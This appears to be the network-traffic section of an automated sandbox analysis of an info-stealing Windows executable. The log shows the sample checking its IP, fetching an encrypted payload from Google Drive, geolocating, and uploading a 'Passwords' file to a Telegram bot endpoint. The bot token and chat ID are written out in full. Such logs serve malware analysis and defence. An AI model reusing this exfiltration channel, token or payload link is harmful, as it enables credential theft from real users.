                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.750009132.226.8.169804136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 10, 2025 22:15:00.982326984 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.749970142.250.186.1104434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:13 UTC216OUTGET /uc?export=download&id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37 HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2025-01-10 21:14:14 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Fri, 10 Jan 2025 21:14:13 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy: script-src 'nonce-HaMsUGxkwbJRgoDnFda1ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.749971142.250.185.654434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:14 UTC258OUTGET /download?id=1WxElmKXXL7CIzaDrqhpdM8ML23VzYG37&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:14:17 UTC4933INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFIdbgSm7GOn4sY3dEvgQgoXnmYWQKyhEFwzVL8KgzboiYokO7zy1qcou8CtqaZTgwYuTgVC
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="PNyXpNcHnfC47.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Tue, 10 Dec 2024 20:28:31 GMT
                                                                                                          Date: Fri, 10 Jan 2025 21:14:16 GMT
                                                                                                          Expires: Fri, 10 Jan 2025 21:14:16 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=uOnRaw==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2025-01-10 21:14:17 UTC4933INData Raw: a8 ef 9d 61 3a ad 3e 33 92 5a 73 a2 08 0c 2b ef 03 cd 69 80 5d 4b d6 b4 ec ef e4 58 ae a7 01 f5 cd 61 c5 85 99 18 c1 11 89 c8 2f 64 d5 a8 41 db 1d f1 a0 9b b7 fe 68 91 62 4f b0 e3 0b c1 c7 d1 d2 52 2b f9 0f 82 30 8f 72 7e 9e ab bf bf db 56 4c 0f 67 ff 65 bd b0 c0 27 dd 6f 9d 9a 00 8c cd db 27 dd 1c 50 bd ed 53 95 cf 5f 22 42 2d 3a 15 db f2 70 f9 48 e8 83 0a 25 9b 7a df eb 68 0d 07 f1 2e a8 4d d9 d4 36 ae e8 e2 19 62 4f 9c 7d 6e 8c bb 72 a6 56 b7 dc 10 88 e5 13 39 32 e4 fb 07 bb c5 55 91 ae 17 22 45 dd f2 64 1f 94 1f b0 a4 b7 24 aa 67 4e 24 d2 89 17 01 f0 71 d2 8a ca 36 a3 a6 7d d1 e3 18 32 8f 3a 53 13 2c 93 de 29 b8 28 f9 6e 41 5d bc c1 71 48 d2 70 db ee 95 75 f7 96 45 b1 e2 d1 50 1f e1 0c 27 ca 13 14 2f b2 34 b8 27 aa 02 82 e1 78 ab 44 ec 14 fc 78 03 77
                                                                                                          Data Ascii: a:>3Zs+i]KXa/dAhbOR+0r~VLge'o'PS_"B-:pH%zh.M6bO}nrV92U"Ed$gN$q6}2:S,)(nA]qHpuEP'/4'xDxw
                                                                                                          2025-01-10 21:14:17 UTC4830INData Raw: 70 09 0b 5a cf ab a1 ee 8e 68 6c 05 f9 ea cc 83 6f b4 cd 32 c7 4d 9e 2b e8 7c 0d dd 63 f9 6f a4 05 3a db 8c 26 4f 18 a6 45 11 67 e5 58 e3 26 31 25 23 70 9c f6 f5 f9 8c fe 81 d1 74 29 e1 04 7b e7 97 31 8e 0c b3 be 32 bd c2 10 a7 af cc a9 fe 16 91 27 8d 37 db e3 ed 26 13 92 98 07 fd c1 2c 01 e8 31 c3 5e 15 a6 94 36 33 0a e5 6d 2e ac b8 5e 72 4e cf f1 a2 7d b7 7e e1 03 bc a1 7d 6e 76 b3 e9 f6 58 6e f5 a3 06 cb fe 23 05 38 7b 99 e6 ab 9c c3 ae eb 4a 0d 94 18 52 07 30 50 99 75 27 1f c7 f3 33 fa 6d 66 96 5e d7 b2 06 19 e9 ee 4c c8 af 66 7e d3 a5 27 e9 5f ee 30 37 d4 0d fd 2b 44 fd 18 cb 8d aa 2d 31 25 70 e3 df 11 6c ff 89 31 7e 04 17 72 87 b1 d5 7a 24 81 67 a7 0b 28 4d b9 81 d6 dd 25 ef 98 6e 33 73 78 ce 02 5e b2 ec 08 a3 35 e6 90 35 c9 73 80 a1 84 12 33 b2 79
                                                                                                          Data Ascii: pZhlo2M+|co:&OEgX&1%#pt){12'7&,1^63m.^rN}~}nvXn#8{JR0Pu'3mf^Lf~'_07+D-1%pl1~rz$g(M%n3sx^55s3y
                                                                                                          2025-01-10 21:14:17 UTC1324INData Raw: 2f b5 8e 14 bd d6 e5 37 37 b6 08 dc f8 97 1c 2c ae d0 d2 34 d1 12 da 38 36 22 29 33 31 c3 38 fb 6f b3 61 14 b3 13 7b 98 7b 76 4e 18 e9 1f 85 56 a6 bd c6 f7 8d 54 16 86 44 ba 8e a4 4f 9c 8f 37 0f 6e 5b 0f 6d 5d 4c 23 9b 4c 25 34 86 0b 13 ce 7b f6 c2 e4 70 5d b1 69 15 cd 07 71 d8 38 44 c8 26 cd 85 0b b9 40 d0 4b 38 e6 ce 7a 1e 6d dd 22 fb d7 c8 23 b8 9f d6 c3 9f 0c c5 aa 0c 82 3a a7 22 7e 9e a1 4b 47 c8 53 e5 0a 4b f2 67 c6 fa c0 67 d9 47 4e 9a 00 86 cd db 27 df 67 18 bd ed 57 eb 9c 5f 22 48 05 6e 15 db f8 7c f1 5b ee 92 0c 09 96 78 a4 23 68 0d 03 d7 e2 12 43 d3 60 3f 63 cb 21 54 2e 82 b9 57 55 e5 c8 58 fe 70 d8 bb 68 e4 81 20 5d 42 8d b9 65 cd 9e 7b f4 8e 61 7f f8 fd 9b 00 3f d0 50 c9 84 da 50 fe 08 60 03 de 83 33 24 f0 71 c3 8a c8 48 ce e3 7d d5 d1 27 31
                                                                                                          Data Ascii: /77,486")318oa{{vNVTDO7n[m]L#L%4{p]iq8D&@K8zm"#:"~KGSKggGN'gW_"Hn|[x#hC`?c!T.WUXph ]Be{a?PP`3$qH}'1
                                                                                                          2025-01-10 21:14:17 UTC1390INData Raw: 4d 6c 27 78 5b f3 96 33 71 52 54 cb 83 a5 f2 f3 e3 7b 73 8a 03 43 c9 98 69 16 3f b6 c5 20 d7 ee f9 6e 47 1f 99 df 02 23 c6 20 ab 4c db d4 f7 96 47 a2 e6 af 5f 1f e1 d6 b3 cf 3b 5a 0f b2 3e 38 88 ab 02 86 e1 2a a9 6c 11 14 fc 72 12 72 02 2a fe d7 59 18 d5 b0 d5 3d 15 64 b0 c5 aa a4 99 bc 29 07 e4 77 ff 0a 1b fd c8 9e 3f d4 3d 91 40 27 d9 b9 ed e5 e3 90 e4 dd 2f 73 2d 5c 1e 89 e1 1e 4d 3e 38 3f 8a ba 0c b3 1e 20 82 af dd f6 ba c2 f9 b5 3e c8 24 47 c6 d3 cd ac f9 1e 09 3e 5d c8 0d b8 04 2e 53 0f 1f 77 36 d9 97 46 da aa 74 9c 2a b3 58 40 23 d3 75 a8 ed e4 92 a3 35 d8 7a cb 07 7e a2 c2 1c f0 4e 5c e5 a0 f2 20 29 3b 05 02 07 e2 9a 27 1a 7a 87 00 1c f9 2f 07 58 46 bd 15 61 31 47 b0 18 08 bb a3 b6 a4 45 86 30 af 53 54 dd 08 00 a0 e4 de cf 12 58 3b 5d b5 58 38 4a
                                                                                                          Data Ascii: Ml'x[3qRT{sCi? nG# LG_;Z>8*lrr*Y=d)w?=@'/s-\M>8? >$G>].Sw6Ft*X@#u5z~N\ );'z/XFa1GE0STX;]X8J
                                                                                                          2025-01-10 21:14:17 UTC1390INData Raw: 6a 71 64 9c 52 3a 20 71 a3 57 eb 36 9c f6 b1 b2 ef e1 2c d0 f0 ad 06 6b 1a b5 89 83 f6 38 7b b9 3c 22 b3 f5 11 99 8b fb b2 29 19 cb 5e 2a b7 3b 6c 25 ca 25 a3 88 2c 21 4d 88 32 7f 29 d6 01 91 29 47 66 25 b3 a6 88 d4 6d 82 e3 bc 08 49 19 fa 26 33 82 99 29 af be 53 7d 60 ec 24 21 65 71 e9 5f c8 b4 3b f8 9f 70 70 18 e7 ed d7 62 f4 db 47 38 e1 56 8a 34 16 2a dd dd 69 f9 ef b7 16 2d ce b3 be 56 09 b5 69 c9 7d f6 49 cf 0a 3d 4a 35 63 84 fc e4 36 45 37 b7 e3 51 3a fa 36 5e e1 97 19 cd 18 a2 af 7e b5 e0 21 b0 be d8 b8 9b 9f 8e 58 a6 4b 9c fc fc 4d 94 a5 24 f9 fc dd c4 fe c2 23 d0 5c 0c 8e 93 24 2e 1b f8 27 5b ad b8 54 70 5e cd e9 cd 77 a6 65 74 58 f5 a1 7d 6e 0a 22 f8 e8 40 71 cc 60 69 44 f4 0b 41 46 5a 93 f5 b9 81 b1 ab eb 30 1e a5 0f 6c e4 b2 4a 93 77 38 e7 c7
                                                                                                          Data Ascii: jqdR: qW6,k8{<")^*;l%%,!M2))Gf%mI&3)S}`$!eq_;ppbG8V4*i-Vi}I=J5c6E7Q:6^~!XKM$#\$.'[Tp^wetX}n"@q`iDAFZ0lJw8
                                                                                                          2025-01-10 21:14:17 UTC1390INData Raw: 90 0c 3b 55 0e 11 26 95 b1 ce 4e 51 15 75 a6 01 3b 7b a8 87 a8 48 27 9d 5a 64 34 6c c6 80 02 54 b8 99 3e 2e 6c e2 e3 a3 c5 74 a2 4a 8c 6c 22 a4 87 5d 3d 14 f2 22 53 3a 10 70 95 9f 73 61 f2 b3 bd ba d4 79 20 84 6a f6 af f5 9d 65 d2 bb 30 a0 2b 64 6f 20 65 a3 3b cd fb ec 3c 54 d8 30 16 81 84 3b fb 4d 42 6d f0 59 1f 7a 16 57 2b c6 a0 ce 60 de f2 a6 d6 97 5e cd 5d 8b f6 3e bb ed f8 09 2a d7 28 34 e8 6e cc 29 6e 24 f9 0d 0c ca 67 05 7f 6c 5d 32 56 3b 8c ff c9 ad b3 2b 75 15 df 32 95 88 f3 ad 83 b3 c1 2e 1e 50 ad 26 2e 1d c3 91 74 29 e2 ac 33 2c d6 d6 b7 d3 d0 20 bc 5f 38 fd c8 da d0 fa 96 2f 6b 97 ff fd 8d 84 0e f1 88 f9 00 47 5d a5 f2 58 71 a9 08 5a bb 6c f7 c8 7d 66 34 30 1d 05 ad c4 2d 16 d2 8e 9c f4 c5 25 28 3e c4 9c 01 df 6f 92 df 48 87 23 b8 0a 45 f8 6f
                                                                                                          Data Ascii: ;U&NQu;{H'Zd4lT>.ltJl"]="S:psay je0+do e;<T0;MBmYzW+`^]>*(4n)n$gl]2V;+u2.P&.t)3, _8/kG]XqZl}f40-%(>oH#Eo
                                                                                                          2025-01-10 21:14:17 UTC1390INData Raw: a8 7f 72 30 1b 92 52 b6 56 a2 84 17 e8 91 76 b3 ca 44 b0 f8 84 52 b6 ff 1f 41 7d 6b 07 67 c7 4a 0b 63 68 25 3e 9c 0c 28 f3 3c f6 c2 e6 7d d9 b1 69 19 e9 5b 03 82 2e 4e be 5a 1b 94 0f 93 6b da 5f ad e6 ce 78 21 64 ce 24 e7 c4 cf 1b ad e5 9c c3 97 19 bc 8b 64 9e 30 ff 19 ab 9e ab 46 4d d3 47 f3 7d 19 e3 65 cd df 15 67 dd 69 8e 9e 08 9d ca a9 bb c1 1c 20 d2 38 53 95 c9 4c 27 53 28 12 86 db f2 76 ea 40 f9 8b 26 66 9d 52 dc 6a 68 07 68 fb 30 12 49 b6 65 3e 63 c3 72 8c 2e 82 bb 3a 0f f4 c1 46 28 25 cb b1 73 e3 9e cd 5b 40 81 84 63 e3 f3 1f 5e 8e 65 5d 3a f8 f4 55 3f d0 5a f2 8d f2 de ce 02 66 3a da 83 33 01 db 51 d2 a2 60 36 f3 e9 75 c0 a8 6b ad 93 8d 19 09 48 93 de 2f d7 77 f9 6e 4b 95 00 c3 70 45 c0 25 db ff f7 06 15 93 4d c1 f4 f9 d1 1f e1 d8 b4 35 10 05 0a
                                                                                                          Data Ascii: r0RVvDRA}kgJch%>(<}i[.NZk_x!d$d0FMG}egi 8SL'S(v@&fRjhh0Ie>cr.:F(%s[@c^e]:U?Zf:3Q`6ukH/wnKpE%M5
                                                                                                          2025-01-10 21:14:17 UTC1390INData Raw: 9f 29 c7 35 82 48 16 9a c5 52 e6 ed 90 ee b2 2b 69 1d 5c 71 c6 e3 1e 47 3a ac 3f 9b bc 6c 63 0f 29 9c 5a c6 68 8f d3 f3 a2 e5 df 45 86 c2 d8 91 18 f4 a3 7b d8 42 d9 78 75 7e 36 21 07 18 7e 6e ee b2 5f ae a7 67 9c 5a 11 7f 74 30 ff c5 25 7c ee 9a b3 17 bc 98 09 07 0e c7 65 26 e6 48 43 d5 7f f2 2a 0b 25 20 15 7f 2f 9f 27 01 0c 18 f4 19 89 30 ce 70 c7 b7 b7 4e 3f c7 6d 09 0d c3 33 57 b3 35 e0 77 f1 53 54 dd bc db ba c5 13 c3 03 5e 65 87 b0 d5 77 25 3e d9 34 d7 e0 f2 b8 32 da 92 5b 6d de a8 3a f8 37 2c 42 b2 f1 f7 b9 78 e7 6c 34 f4 ca 28 5b 9f 53 18 0b b8 dc 15 8a 5b bb aa 1b d5 72 98 16 3e 7a 8b 2c 60 a4 de f5 46 82 f8 c2 58 fe ec 0e 8d ff bc 02 fa 1b c7 d9 9d f6 48 05 55 2b f4 aa e5 d6 f1 75 fd 8c c3 f4 24 b0 24 c5 b1 66 00 92 3e ed 88 26 38 50 99 0b 3c 30
                                                                                                          Data Ascii: )5HR+i\qG:?lc)ZhE{Bxu~6!~n_gZt0%|e&HC*% /'0pN?m3W5wST^ew%>42[m:7,Bxl4([S[r>z,`FXHU+u$$f>&8P<0
                                                                                                          2025-01-10 21:14:17 UTC1390INData Raw: 13 f9 c4 7d 10 f3 c6 32 c7 4d 88 dc 84 55 1e d1 78 f5 3d fb 18 b7 e0 a4 ad 4e 3d ba 37 29 7f e5 21 6d 04 2f 43 80 55 84 8e d9 30 52 9d 06 dc 5e 38 e5 ac 4d f9 e5 5f c9 0c c3 16 ca b1 d1 15 05 8a d0 db 4b 2c 91 57 2b 6d 2d e8 ed 5c 16 b7 67 08 fd cb 3e ee e4 0a 88 4f 10 95 0f 38 33 0a e1 1e a2 bd bf 43 b7 5b d9 e6 db 72 b1 40 05 8e ce 5e 7d 64 c7 2d cc de 61 6e e4 af 7a 4a fe 0b 5d 46 5a 93 38 af f3 79 ef f7 40 0d 85 1e 7a 96 23 50 93 07 00 15 c7 83 71 cd 6d 66 80 31 ea b2 42 13 c1 a8 57 f8 a1 09 90 d2 a5 2d da 4e e8 53 33 cc 11 a5 8d 59 fd 12 bd cc 1b 26 41 7d 16 a4 df 1b 6c 90 1c 19 86 0e 17 06 9e b6 ec 38 56 15 67 a1 72 ec 4a a8 81 b5 40 57 b5 8e 7f 44 73 3c ce 02 52 94 9a 47 70 35 e2 e5 b5 13 60 8c a4 9f 6b 10 a5 78 5c 30 15 f0 20 30 57 20 79 f1 e3 a2
                                                                                                          Data Ascii: }2MUx=N=7)!m/CU0R^8M_K,W+m-\g>O83C[r@^}d-anzJ]FZ8y@z#Pqmf1BW-NS3Y&A}l8VgrJ@WDs<RGp5`kx\0 0W y
                                                                                                          2025-01-10 21:14:17 UTC1390INData Raw: 1f b6 57 2b e6 c9 e8 60 de f8 b5 df 86 44 b9 c0 8b a1 3e a8 e7 83 02 45 2a 38 34 e2 7d 83 38 65 36 ee 2c 04 e6 02 15 75 03 90 32 56 20 9b 8f 2a 85 6b 21 1a 1f ac ab ba a0 e9 85 cd b9 cd 24 14 50 ba 06 b9 9d c3 9b 75 3d d6 fb 3f 01 66 0e d3 15 d8 55 ab 53 30 8e be cb c1 82 8c ec 6b 97 f8 b4 84 eb dd fb 88 23 1f 13 27 b8 3e 5c ac 86 c9 d6 e2 6c ff d8 69 13 54 37 0c 72 d4 19 a3 7f cf 59 bc 83 c2 57 5c 22 c4 fd 69 1e 79 ba 3e 5b 83 21 ba 09 e9 44 56 26 a3 7f e7 28 2f b3 99 39 7d d3 cd ae 4a fc 0e cf f4 83 02 02 96 9c fa 37 d4 10 ab 1c 32 23 2d 11 8c c6 39 f1 65 99 f0 9a da 68 25 91 6a 7b 58 e4 93 41 8f 47 a8 83 e9 f6 9e 55 7a c1 68 ac a2 0e 4f b6 85 26 0a 12 34 0d 6d cd 5d 2a b3 fd 25 34 91 18 14 b5 3d f6 e9 c0 0e 26 1b 69 1f ef 5b 60 df 40 d2 d2 35 b9 fb da
                                                                                                          Data Ascii: W+`D>E*84}8e6,u2V *k!$Pu=?fUS0k#'>\liT7rYW\"iy>[!DV&(/9}J72#-9eh%j{XAGUzhO&4m]*%4=&i[`@5


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.749973104.21.32.14434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:14:20 UTC853INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 21:14:20 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1858449
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NE2tyNPHHAr5EZJ2sNDurrU1J2GXhTku2gReWSuKdpVbFhycH8PpGWyKQUajw6UUmCArcrWUdoZXJhF2DAztjF0p%2BuLMRe9i7qDLvlFhkxa%2FHv2tQN8ZpjaKXW9MXGJswtuFI3fF"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fffad159c448cda-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1919&min_rtt=1852&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1576673&cwnd=243&unsent_bytes=0&cid=2ebfdad100d54153&ts=291&x=0"
                                                                                                          2025-01-10 21:14:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.749974149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:26 UTC299OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31a2051f68ff
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:14:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 32 30 35 31 66 36 38 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31a2051f68ffContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:27 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:27 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:27 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
